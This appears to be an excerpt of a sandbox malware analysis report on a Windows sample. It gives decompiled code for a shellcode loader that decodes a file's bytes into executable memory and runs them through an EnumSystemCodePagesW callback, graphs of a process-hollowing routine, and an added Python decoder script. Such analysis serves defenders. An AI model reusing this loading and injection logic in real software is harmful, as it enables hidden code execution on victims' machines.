7646->7648 7647->7646 7648->7645 7650 f22922 __wsopen_helper 7649->7650 7651 f22946 7650->7651 7652 f2292f 7650->7652 7654 f22a0a 7651->7654 7656 f2295a 7651->7656 7653 f21c8f __commit 58 API calls 7652->7653 7655 f22934 7653->7655 7657 f21c8f __commit 58 API calls 7654->7657 7659 f21cc3 _memcpy_s 58 API calls 7655->7659 7660 f22985 7656->7660 7661 f22978 7656->7661 7658 f2297d 7657->7658 7666 f21cc3 _memcpy_s 58 API calls 7658->7666 7673 f2293b __wsopen_helper 7659->7673 7663 f22992 7660->7663 7664 f229a7 7660->7664 7662 f21c8f __commit 58 API calls 7661->7662 7662->7658 7667 f21c8f __commit 58 API calls 7663->7667 7665 f26c88 ___lock_fhandle 59 API calls 7664->7665 7668 f229ad 7665->7668 7669 f2299f 7666->7669 7670 f22997 7667->7670 7671 f229d3 7668->7671 7672 f229c0 7668->7672 7676 f21e89 _memcpy_s 9 API calls 7669->7676 7674 f21cc3 _memcpy_s 58 API calls 7670->7674 7677 f21cc3 _memcpy_s 58 API calls 7671->7677 7675 f22a2a __read_nolock 70 API calls 7672->7675 7673->7627 7674->7669 7678 f229cc 7675->7678 7676->7673 7679 f229d8 7677->7679 7685 f22a02 7678->7685 7680 f21c8f 
__commit 58 API calls 7679->7680 7680->7678 7683 f248b1 __malloc_crt 58 API calls 7682->7683 7684 f265bc 7683->7684 7684->7621 7688 f2702e LeaveCriticalSection 7685->7688 7687 f22a08 7687->7673 7688->7687 7692 f21932 7689->7692 7691 f217d9 7693 f2193e __wsopen_helper 7692->7693 7694 f2442f __lock 51 API calls 7693->7694 7695 f21945 7694->7695 7696 f219fe _doexit 7695->7696 7697 f21973 DecodePointer 7695->7697 7712 f21a4c 7696->7712 7697->7696 7699 f2198a DecodePointer 7697->7699 7705 f2199a 7699->7705 7701 f21a5b __wsopen_helper 7701->7691 7703 f219a7 EncodePointer 7703->7705 7704 f21a43 7706 f21a4c 7704->7706 7707 f217a8 _fast_error_exit 3 API calls 7704->7707 7705->7696 7705->7703 7708 f219b7 DecodePointer EncodePointer 7705->7708 7709 f21a59 7706->7709 7717 f24599 LeaveCriticalSection 7706->7717 7707->7706 7711 f219c9 DecodePointer DecodePointer 7708->7711 7709->7691 7711->7705 7713 f21a52 7712->7713 7714 f21a2c 7712->7714 7718 f24599 LeaveCriticalSection 7713->7718 7714->7701 7716 f24599 LeaveCriticalSection 7714->7716 7716->7704 7717->7709 7718->7714 8039 f28bc0 8040 f28bcc __wsopen_helper 8039->8040 8041 f28c03 __wsopen_helper 8040->8041 8042 f2442f __lock 58 API calls 8040->8042 8043 f28be0 8042->8043 8044 f273d6 __updatetlocinfoEx_nolock 58 API calls 8043->8044 8045 f28bf0 8044->8045 8047 f28c09 8045->8047 8050 f24599 LeaveCriticalSection 8047->8050 8049 f28c10 8049->8041 8050->8049 8517 f24985 8518 f24988 8517->8518 8519 f27580 _abort 62 API calls 8518->8519 8520 f24994 8519->8520 8051 f21ec9 8052 f21ed1 8051->8052 8053 f24869 __calloc_crt 58 API calls 8052->8053 8054 f21eeb 8053->8054 8055 f24869 __calloc_crt 58 API calls 8054->8055 8056 f21f04 8054->8056 8055->8056

                                          Control-flow Graph
                                          control_flow_graph 0 1603f8-1604e3 GetPEB call 1607a4 * 7 call 160772 CreateFileW 17 1605cd 0->17 18 1604e9-1604f3 0->18 19 1605cf-1605d3 17->19 23 1605c9-1605cb 18->23 24 1604f9-160509 VirtualAlloc 18->24 21 1605d5-1605d7 19->21 22 1605fc-160600 19->22 27 1605dd-1605e2 21->27 28 1605d9 21->28 25 1605e4-1605e9 22->25 26 160602-160607 22->26 34 1605c4-1605c7 23->34 24->23 31 16050f-16051e ReadFile 24->31 29 1605f2-1605f4 25->29 30 1605eb-1605f0 25->30 32 160614-16061a 26->32 33 160609-160611 VirtualFree 26->33 27->22 28->27 36 1605f6-1605f8 29->36 37 1605fa 29->37 30->22 31->23 38 160524-160545 VirtualAlloc 31->38 33->32 34->19 36->22 37->22 39 160547-16055c call 16070b 38->39 40 1605c2 38->40 43 160593-1605a7 call 1607a4 39->43 44 16055e-160567 39->44 40->34 43->19 50 1605a9-1605ab 43->50 46 16056a-160591 call 16070b 44->46 46->43 51 1605b1-1605c0 VirtualFree 50->51 52 1605ad-1605ae CloseHandle 50->52 51->34 52->51
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001604DB
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00160502
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00160519
                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0016053D
                                          • CloseHandle.KERNELBASE(00000000,?), ref: 001605AE
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 001605B9
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00160611
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979087445.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_160000_bmexo.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                          • String ID:
                                          • API String ID: 721982790-0
                                          • Opcode ID: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                          • Instruction ID: 02df1ffc338fe68e98fd4a71815f73bdd15a4c024a1351c0efb51b207760b69a
                                          • Opcode Fuzzy Hash: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                          • Instruction Fuzzy Hash: 46618D35E00214ABCF11DBA8CC84BAFBBB5EF98710F248519E946EB290DB749D51CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          control_flow_graph 53 161001-1610af call 1606f7 call 1607a4 * 7 70 1610b2-1610b6 53->70 71 1610ce-1610db 70->71 72 1610b8-1610cc 70->72 73 1610de-1610e2 71->73 72->70 74 1610e4-1610f8 73->74 75 1610fa-161116 73->75 74->73 77 161120-16114a CreateProcessW 75->77 78 161118-16111b 75->78 81 161154-16116d 77->81 82 16114c-16114f 77->82 79 1612c3-1612c4 78->79 84 161177-161191 ReadProcessMemory 81->84 85 16116f-161172 81->85 82->79 86 161193-161196 84->86 87 16119b-1611a4 84->87 85->79 86->79 88 1611a6-1611b5 87->88 89 1611ce-1611ee VirtualAllocEx 87->89 88->89 90 1611b7-1611c4 call 160360 88->90 91 1611f0-1611f3 89->91 92 1611f8-161210 call 160261 89->92 90->89 97 1611c6-1611c9 90->97 91->79 98 161212-161215 92->98 99 16121a-16121e 92->99 97->79 98->79 100 161227-161231 99->100 101 161233-161261 call 160261 100->101 102 161268-161284 call 160261 100->102 105 161266 101->105 108 161286-161289 102->108 109 16128b-1612a9 Wow64SetThreadContext 102->109 105->100 108->79 110 1612b0-1612b3 call 1601b2 109->110 111 1612ab-1612ae 109->111 113 1612b8-1612ba 110->113 111->79 114 1612c1 113->114 115 1612bc-1612bf 113->115 114->79 115->79
                                          APIs
                                          • CreateProcessW.KERNEL32(?,00000000), ref: 00161145
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979087445.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_160000_bmexo.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: D
                                          • API String ID: 963392458-2746444292
                                          • Opcode ID: 568e0db77cf279602cee2811cafd0835d1d7b78f7f3828ca7258fa144f630f1e
                                          • Instruction ID: df8d9944b7fdc9480021e1249a190c63b490a0713ffd88b4680685b467bbff9b
                                          • Opcode Fuzzy Hash: 568e0db77cf279602cee2811cafd0835d1d7b78f7f3828ca7258fa144f630f1e
                                          • Instruction Fuzzy Hash: ECA1E070E00209AFDB45DFA4CD91BAEBBB5BF48304F244469E616EB250D771AAA1DF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          control_flow_graph 116 160809-1609b1 call 1606f7 call 1607a4 * 10 CreateFileW 142 1609b5-1609c4 116->142 143 1609b3 116->143 146 1609c6 142->146 147 1609c8-1609de VirtualAlloc 142->147 144 160a1b-160a1c 143->144 146->144 148 1609e2-1609f6 ReadFile 147->148 149 1609e0 147->149 150 1609fa-160a18 CloseHandle call 160a1d call 160cdb ExitProcess 148->150 151 1609f8 148->151 149->144 151->144
                                          APIs
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001609A7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979087445.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_160000_bmexo.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: bad82d185a301e20c64f029e77ff8f0add54596996ee23a4283a6c9c8dfde966
                                          • Instruction ID: 6481a5b9075f6cbe9675bb2b94f1178a74b15aa13e0639fc4fe2d842705cd943
                                          • Opcode Fuzzy Hash: bad82d185a301e20c64f029e77ff8f0add54596996ee23a4283a6c9c8dfde966
                                          • Instruction Fuzzy Hash: 05613B35E50348EADF51DBE4ED12BEEB7B5AF88710F20451AE518FA2A0DB701E90DB05
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          control_flow_graph 156 f212bc-f212d5 157 f212f2 156->157 158 f212d7-f212dc 156->158 159 f212f4-f212fa 157->159 158->157 160 f212de-f212e0 158->160 161 f212e2-f212e7 call f21cc3 160->161 162 f212fb-f21300 160->162 170 f212ed call f21e89 161->170 164 f21302-f2130c 162->164 165 f2130e-f21312 162->165 164->165 167 f21332-f21341 164->167 168 f21322-f21324 165->168 169 f21314-f2131f call f21530 165->169 173 f21343-f21346 167->173 174 f21348 167->174 168->161 172 f21326-f21330 168->172 169->168 170->157 172->161 172->167 175 f2134d-f21352 173->175 174->175 178 f2143b-f2143e 175->178 179 f21358-f2135f 175->179 178->159 180 f213a0-f213a2 179->180 181 f21361-f21369 179->181 183 f213a4-f213a6 180->183 184 f2140c-f2140d call f22752 180->184 181->180 182 f2136b 181->182 185 f21371-f21373 182->185 186 f21469 182->186 187 f213ca-f213d5 183->187 188 f213a8-f213b0 183->188 197 f21412-f21416 184->197 192 f21375-f21377 185->192 193 f2137a-f2137f 185->193 194 f2146d-f21476 186->194 190 f213d7 187->190 191 f213d9-f213dc 187->191 195 f213b2-f213be 188->195 196 f213c0-f213c4 188->196 190->191 199 f21443-f21447 191->199 200 f213de-f213ea call f22873 call f22a2a 191->200 192->193 193->199 201 f21385-f2139e call f22897 193->201 194->159 198 f213c6-f213c8 195->198 196->198 197->194 202 f21418-f2141d 197->202 198->191 204 f21459-f21464 call f21cc3 199->204 205 f21449-f21456 call f21530 199->205 217 f213ef-f213f4 200->217 216 f21401-f2140a 201->216 202->199 203 f2141f-f21430 202->203 208 f21433-f21435 203->208 204->170 205->204 208->178 208->179 216->208 218 f213fa-f213fd 217->218 219 f2147b-f2147f 217->219 218->186 220 f213ff 218->220 219->194 220->216
                                          C-Code - Quality: 69%
                                          			E00F212BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                          				char* _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				void* __ebx;
                                          				void* __esi;
                                          				signed int _t74;
                                          				signed int _t78;
                                          				char _t81;
                                          				signed int _t86;
                                          				signed int _t88;
                                          				signed int _t91;
                                          				signed int _t94;
                                          				signed int _t97;
                                          				signed int _t98;
                                          				char* _t99;
                                          				signed int _t100;
                                          				signed int _t102;
                                          				signed int _t103;
                                          				signed int _t104;
                                          				char* _t110;
                                          				signed int _t113;
                                          				signed int _t117;
                                          				signed int _t119;
                                          				void* _t120;
                                          
                                          				_t99 = _a4;
                                          				_t74 = _a8;
                                          				_v8 = _t99;
                                          				_v12 = _t74;
                                          				if(_a12 == 0) {
                                          					L5:
                                          					return 0;
                                          				}
                                          				_t97 = _a16;
                                          				if(_t97 == 0) {
                                          					goto L5;
                                          				}
                                          				if(_t99 != 0) {
                                          					_t119 = _a20;
                                          					__eflags = _t119;
                                          					if(_t119 == 0) {
                                          						L9:
                                          						__eflags = _a8 - 0xffffffff;
                                          						if(_a8 != 0xffffffff) {
                                          							_t74 = E00F21530(_t99, 0, _a8);
                                          							_t120 = _t120 + 0xc;
                                          						}
                                          						__eflags = _t119;
                                          						if(_t119 == 0) {
                                          							goto L3;
                                          						} else {
                                          							_t78 = _t74 | 0xffffffff;
                                          							__eflags = _t97 - _t78 / _a12;
                                          							if(_t97 > _t78 / _a12) {
                                          								goto L3;
                                          							}
                                          							L13:
                                          							_t117 = _a12 * _t97;
                                          							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                          							_t98 = _t117;
                                          							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                          								_t100 = 0x1000;
                                          							} else {
                                          								_t100 =  *(_t119 + 0x18);
                                          							}
                                          							_v16 = _t100;
                                          							__eflags = _t117;
                                          							if(_t117 == 0) {
                                          								L41:
                                          								return _a16;
                                          							} else {
                                          								do {
                                          									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                          									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                          										L24:
                                          										__eflags = _t98 - _t100;
                                          										if(_t98 < _t100) {
                                          											_t81 = E00F22752(_t98, _t119, _t119); // executed
                                          											__eflags = _t81 - 0xffffffff;
                                          											if(_t81 == 0xffffffff) {
                                          												L46:
                                          												return (_t117 - _t98) / _a12;
                                          											}
                                          											_t102 = _v12;
                                          											__eflags = _t102;
                                          											if(_t102 == 0) {
                                          												L42:
                                          												__eflags = _a8 - 0xffffffff;
                                          												if(_a8 != 0xffffffff) {
                                          													E00F21530(_a4, 0, _a8);
                                          												}
                                          												 *((intOrPtr*)(E00F21CC3())) = 0x22;
                                          												L4:
                                          												E00F21E89();
                                          												goto L5;
                                          											}
                                          											_t110 = _v8;
                                          											 *_t110 = _t81;
                                          											_t98 = _t98 - 1;
                                          											_v8 = _t110 + 1;
                                          											_t103 = _t102 - 1;
                                          											__eflags = _t103;
                                          											_v12 = _t103;
                                          											_t100 =  *(_t119 + 0x18);
                                          											_v16 = _t100;
                                          											goto L40;
                                          										}
                                          										__eflags = _t100;
                                          										if(_t100 == 0) {
                                          											_t86 = 0x7fffffff;
                                          											__eflags = _t98 - 0x7fffffff;
                                          											if(_t98 <= 0x7fffffff) {
                                          												_t86 = _t98;
                                          											}
                                          										} else {
                                          											__eflags = _t98 - 0x7fffffff;
                                          											if(_t98 <= 0x7fffffff) {
                                          												_t44 = _t98 % _t100;
                                          												__eflags = _t44;
                                          												_t113 = _t44;
                                          												_t91 = _t98;
                                          											} else {
                                          												_t113 = 0x7fffffff % _t100;
                                          												_t91 = 0x7fffffff;
                                          											}
                                          											_t86 = _t91 - _t113;
                                          										}
                                          										__eflags = _t86 - _v12;
                                          										if(_t86 > _v12) {
                                          											goto L42;
                                          										} else {
                                          											_push(_t86);
                                          											_push(_v8);
                                          											_push(E00F22873(_t119)); // executed
                                          											_t88 = E00F22A2A(); // executed
                                          											_t120 = _t120 + 0xc;
                                          											__eflags = _t88;
                                          											if(_t88 == 0) {
                                          												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                                          												goto L46;
                                          											}
                                          											__eflags = _t88 - 0xffffffff;
                                          											if(_t88 == 0xffffffff) {
                                          												L45:
                                          												_t64 = _t119 + 0xc;
                                          												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                                          												__eflags =  *_t64;
                                          												goto L46;
                                          											}
                                          											_t98 = _t98 - _t88;
                                          											__eflags = _t98;
                                          											L36:
                                          											_v8 = _v8 + _t88;
                                          											_v12 = _v12 - _t88;
                                          											_t100 = _v16;
                                          											goto L40;
                                          										}
                                          									}
                                          									_t94 =  *(_t119 + 4);
                                          									_v20 = _t94;
                                          									__eflags = _t94;
                                          									if(__eflags == 0) {
                                          										goto L24;
                                          									}
                                          									if(__eflags < 0) {
                                          										goto L45;
                                          									}
                                          									__eflags = _t98 - _t94;
                                          									if(_t98 < _t94) {
                                          										_t94 = _t98;
                                          										_v20 = _t98;
                                          									}
                                          									_t104 = _v12;
                                          									__eflags = _t94 - _t104;
                                          									if(_t94 > _t104) {
                                          										goto L42;
                                          									} else {
                                          										E00F22897(_v8, _t104,  *_t119, _t94);
                                          										_t88 = _v20;
                                          										_t120 = _t120 + 0x10;
                                          										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                                          										_t98 = _t98 - _t88;
                                          										 *_t119 =  *_t119 + _t88;
                                          										goto L36;
                                          									}
                                          									L40:
                                          									__eflags = _t98;
                                          								} while (_t98 != 0);
                                          								goto L41;
                                          							}
                                          						}
                                          					}
                                          					_t74 = (_t74 | 0xffffffff) / _a12;
                                          					__eflags = _t97 - _t74;
                                          					if(_t97 <= _t74) {
                                          						goto L13;
                                          					}
                                          					goto L9;
                                          				}
                                          				L3:
				 *((intOrPtr*)(E00F21CC3())) = 0x16; // errno = 0x16 (EINVAL)
                                          				goto L4;
                                          			}
Instruction addresses (one per line of the decompiled code above, in order; 0x00000000 marks a line with no instruction of its own):
                                          0x00f212c6
                                          0x00f212c9
                                          0x00f212cf
                                          0x00f212d2
                                          0x00f212d5
                                          0x00f212f2
                                          0x00000000
                                          0x00f212f2
                                          0x00f212d7
                                          0x00f212dc
                                          0x00000000
                                          0x00000000
                                          0x00f212e0
                                          0x00f212fb
                                          0x00f212fe
                                          0x00f21300
                                          0x00f2130e
                                          0x00f2130e
                                          0x00f21312
                                          0x00f2131a
                                          0x00f2131f
                                          0x00f2131f
                                          0x00f21322
                                          0x00f21324
                                          0x00000000
                                          0x00f21326
                                          0x00f21326
                                          0x00f2132e
                                          0x00f21330
                                          0x00000000
                                          0x00000000
                                          0x00f21332
                                          0x00f21335
                                          0x00f21338
                                          0x00f2133f
                                          0x00f21341
                                          0x00f21348
                                          0x00f21343
                                          0x00f21343
                                          0x00f21343
                                          0x00f2134d
                                          0x00f21350
                                          0x00f21352
                                          0x00f2143b
                                          0x00000000
                                          0x00f21358
                                          0x00f21358
                                          0x00f21358
                                          0x00f2135f
                                          0x00f213a0
                                          0x00f213a0
                                          0x00f213a2
                                          0x00f2140d
                                          0x00f21413
                                          0x00f21416
                                          0x00f2146d
                                          0x00000000
                                          0x00f21473
                                          0x00f21418
                                          0x00f2141b
                                          0x00f2141d
                                          0x00f21443
                                          0x00f21443
                                          0x00f21447
                                          0x00f21451
                                          0x00f21456
                                          0x00f2145e
                                          0x00f212ed
                                          0x00f212ed
                                          0x00000000
                                          0x00f212ed
                                          0x00f2141f
                                          0x00f21422
                                          0x00f21425
                                          0x00f21426
                                          0x00f21429
                                          0x00f21429
                                          0x00f2142a
                                          0x00f2142d
                                          0x00f21430
                                          0x00000000
                                          0x00f21430
                                          0x00f213a4
                                          0x00f213a6
                                          0x00f213ca
                                          0x00f213cf
                                          0x00f213d5
                                          0x00f213d7
                                          0x00f213d7
                                          0x00f213a8
                                          0x00f213aa
                                          0x00f213b0
                                          0x00f213c2
                                          0x00f213c2
                                          0x00f213c2
                                          0x00f213c4
                                          0x00f213b2
                                          0x00f213b7
                                          0x00f213b9
                                          0x00f213b9
                                          0x00f213c6
                                          0x00f213c6
                                          0x00f213d9
                                          0x00f213dc
                                          0x00000000
                                          0x00f213de
                                          0x00f213de
                                          0x00f213df
                                          0x00f213e9
                                          0x00f213ea
                                          0x00f213ef
                                          0x00f213f2
                                          0x00f213f4
                                          0x00f2147b
                                          0x00000000
                                          0x00f2147b
                                          0x00f213fa
                                          0x00f213fd
                                          0x00f21469
                                          0x00f21469
                                          0x00f21469
                                          0x00f21469
                                          0x00000000
                                          0x00f21469
                                          0x00f213ff
                                          0x00f213ff
                                          0x00f21401
                                          0x00f21401
                                          0x00f21404
                                          0x00f21407
                                          0x00000000
                                          0x00f21407
                                          0x00f213dc
                                          0x00f21361
                                          0x00f21364
                                          0x00f21367
                                          0x00f21369
                                          0x00000000
                                          0x00000000
                                          0x00f2136b
                                          0x00000000
                                          0x00000000
                                          0x00f21371
                                          0x00f21373
                                          0x00f21375
                                          0x00f21377
                                          0x00f21377
                                          0x00f2137a
                                          0x00f2137d
                                          0x00f2137f
                                          0x00000000
                                          0x00f21385
                                          0x00f2138c
                                          0x00f21391
                                          0x00f21394
                                          0x00f21397
                                          0x00f2139a
                                          0x00f2139c
                                          0x00000000
                                          0x00f2139c
                                          0x00f21433
                                          0x00f21433
                                          0x00f21433
                                          0x00000000
                                          0x00f21358
                                          0x00f21352
                                          0x00f21324
                                          0x00f21307
                                          0x00f2130a
                                          0x00f2130c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f2130c
                                          0x00f212e2
                                          0x00f212e7
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: 59fc80b96fffc72afd815ad67ce1625b61f32b5ac41ee5beda371c02a2359130
                                          • Instruction ID: 1bcf9de745c09619da9bc4635b07aa96935cbff39a7f37e185754ced7966e0f4
                                          • Opcode Fuzzy Hash: 59fc80b96fffc72afd815ad67ce1625b61f32b5ac41ee5beda371c02a2359130
                                          • Instruction Fuzzy Hash: 6851C631E00325DBDB24DFA9F88066E77A6BF61330F248729F829866D0D7749D50AB49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
Control-flow graph blocks (id: address range, calls in the block):
• 221: f21000-f21055 (call f2114b, call f211dd, VirtualAlloc, call f21481)
• 228: f21057-f21067 (call f21530)
• 229: f21088-f2108e
• 232: f2106a-f2107d
• 233: f2107f-f21082 (EnumSystemCodePagesW)
Edges: 221->228, 221->229, 228->232, 232->232 (the byte-decode loop), 232->233, 233->229
                                          C-Code - Quality: 92%
                                          			E00F21000(void* __ecx, void* __eflags, intOrPtr _a12) {
                                          				intOrPtr _v8;
                                          				void* __ebx;
                                          				void* __edi;
                                          				intOrPtr _t6;
                                          				void* _t7;
                                          				_Unknown_base(*)()* _t8;
                                          				void* _t20;
                                          				_Unknown_base(*)()* _t21;
                                          				void* _t26;
                                          				void* _t27;
                                          				void* _t28;
                                          				intOrPtr* _t34;
                                          
				_push(_t20);
				_t28 = 0; // executed
				_t6 = E00F2114B(_t20, _t26, 0, 0x17d78400); // executed  -- _malloc of 0x17d78400 bytes (about 400 MB); success is checked below
				 *_t34 = 0xf33000;
				_v8 = _t6;
				_t7 = E00F211DD(_a12, _t27); // executed  -- _wfopen; the returned FILE* is read from below
				_t8 = VirtualAlloc(0, 0x12ca, 0x3000, 0x40); // executed  -- 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
				_t21 = _t8;
				E00F21481(_t21, 0x12ca, 1, _t7); // executed  -- __fread_nolock: 0x12ca bytes from the file straight into the RWX buffer
				_t10 = _v8;
				if(_v8 != 0) { // the payload is only decoded and run if the large allocation succeeded
					E00F21530(_t10, 0xcb, 0x17d78400); // _memset: fills the whole 400 MB allocation with 0xcb
					do {
						 *((char*)(_t21 + _t28)) = (( *((intOrPtr*)(_t21 + _t28)) + 0x00000001 ^ 0x000000cc) - 0x00000076 ^ 0x000000d6) + 2; // in-place byte decode: ((((b + 1) ^ 0xcc) - 0x76) ^ 0xd6) + 2, with + and - binding tighter than ^
						_t28 = _t28 + 1;
					} while (_t28 < 0x12ca);
					EnumSystemCodePagesW(_t21, 0); // executed  -- the RWX buffer is passed as the EnumCodePagesProcW callback, so the decoded bytes execute
				}
				return 0;
                                          			}

Instruction addresses (one per line of the decompiled code above, in order):
                                          0x00f21004
                                          0x00f2100c
                                          0x00f2100e
                                          0x00f21013
                                          0x00f2101d
                                          0x00f21020
                                          0x00f21036
                                          0x00f21044
                                          0x00f21048
                                          0x00f2104d
                                          0x00f21055
                                          0x00f21062
                                          0x00f2106a
                                          0x00f21077
                                          0x00f2107a
                                          0x00f2107b
                                          0x00f21082
                                          0x00f21082
                                          0x00f2108e

                                          APIs
                                          • _malloc.LIBCMT ref: 00F2100E
                                            • Part of subcall function 00F2114B: __FF_MSGBANNER.LIBCMT ref: 00F21162
                                            • Part of subcall function 00F2114B: __NMSG_WRITE.LIBCMT ref: 00F21169
                                            • Part of subcall function 00F2114B: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F248C7,00000000,00000000,00000000,00000000,?,00F244F9,00000018,00F32280), ref: 00F2118E
                                            • Part of subcall function 00F211DD: __wfsopen.LIBCMT ref: 00F211E8
                                          • VirtualAlloc.KERNELBASE(00000000,000012CA,00003000,00000040), ref: 00F21036
                                          • __fread_nolock.LIBCMT ref: 00F21048
                                          • _memset.LIBCMT ref: 00F21062
                                          • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 00F21082
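The loader in E00F21000 above reads 0x12ca bytes from the file it opens with _wfopen into a fresh PAGE_EXECUTE_READWRITE allocation, rewrites every byte with the expression in the do-while loop, and then hands the buffer to EnumSystemCodePagesW as the enumeration callback, so the first thing the API does is call into it. The report shows the transform but not the payload bytes, so the script below is an added example written for this page, not code from the report or from the sample. It implements the byte transform with C operator precedence (+ and - bind tighter than ^), the inverse transform (used only to construct a test blob), and a coarse triage heuristic that looks for 32-bit fs:[0x30] PEB reads in the decoded output; that heuristic is an assumption about typical position-independent x86 shellcode, not something the page shows. The sample bytes in the test are constructed.

```python
"""Decoder for the 0x12CA-byte blob executed by E00F21000 (added example, not from the report).

Per decompiled byte b (all arithmetic mod 256):
    ((((b + 1) ^ 0xCC) - 0x76) ^ 0xD6) + 2
"""
import re

PAYLOAD_LEN = 0x12CA  # size passed to VirtualAlloc and __fread_nolock in E00F21000

# Assumed triage pattern: mov eax, fs:[0x30] (64 A1 30 00 00 00) or
# mov r32, fs:[0x30] (64 8B /r 30 00 00 00) - a common PEB lookup in x86 shellcode.
_PEB_READ = re.compile(rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x35\x3d])\x30\x00\x00\x00")


def decode_byte(b: int) -> int:
    """One iteration of the loop at f2106a-f2107d, applied to a single byte."""
    x = (b + 1) & 0xFF
    x ^= 0xCC
    x = (x - 0x76) & 0xFF
    x ^= 0xD6
    return (x + 2) & 0xFF


def encode_byte(p: int) -> int:
    """Inverse of decode_byte; only needed to build test data (not present in the sample)."""
    x = (p - 2) & 0xFF
    x ^= 0xD6
    x = (x + 0x76) & 0xFF
    x ^= 0xCC
    return (x - 1) & 0xFF


def decode_payload(blob: bytes) -> bytes:
    """Decode exactly what the loader would: at most PAYLOAD_LEN bytes, in place, byte by byte."""
    return bytes(decode_byte(b) for b in blob[:PAYLOAD_LEN])


def encode_payload(data: bytes) -> bytes:
    """Produce a blob that decode_payload() turns back into data (test helper)."""
    return bytes(encode_byte(b) for b in data)


def find_peb_access(data: bytes) -> list:
    """Offsets of fs:[0x30] reads in decoded output; a hit suggests real shellcode rather than junk."""
    return [m.start() for m in _PEB_READ.finditer(data)]


if __name__ == "__main__":
    import sys
    src = sys.argv[1]  # the file the sample opens, once identified from its file activity
    with open(src, "rb") as fh:
        decoded = decode_payload(fh.read())
    with open(src + ".decoded.bin", "wb") as fh:
        fh.write(decoded)
    print(f"wrote {len(decoded)} bytes; PEB-read candidates at {find_peb_access(decoded)}")
```

Point the script at the input file once it is identified from the process's file activity; the decoded output can then be loaded into a disassembler at offset 0, since EnumSystemCodePagesW calls the buffer's first byte as a stdcall callback with a single argument.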
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                                          • String ID:
                                          • API String ID: 3693343133-0
                                          • Opcode ID: 457cafc6f259f2c9cd2b42b485befe0c1f0c91649ee63d2f51f8a4702b3650f6
                                          • Instruction ID: b85017fdeed459ce3e2837d68eeccf53ea42e267804486f930ddcc8d970817ca
                                          • Opcode Fuzzy Hash: 457cafc6f259f2c9cd2b42b485befe0c1f0c91649ee63d2f51f8a4702b3650f6
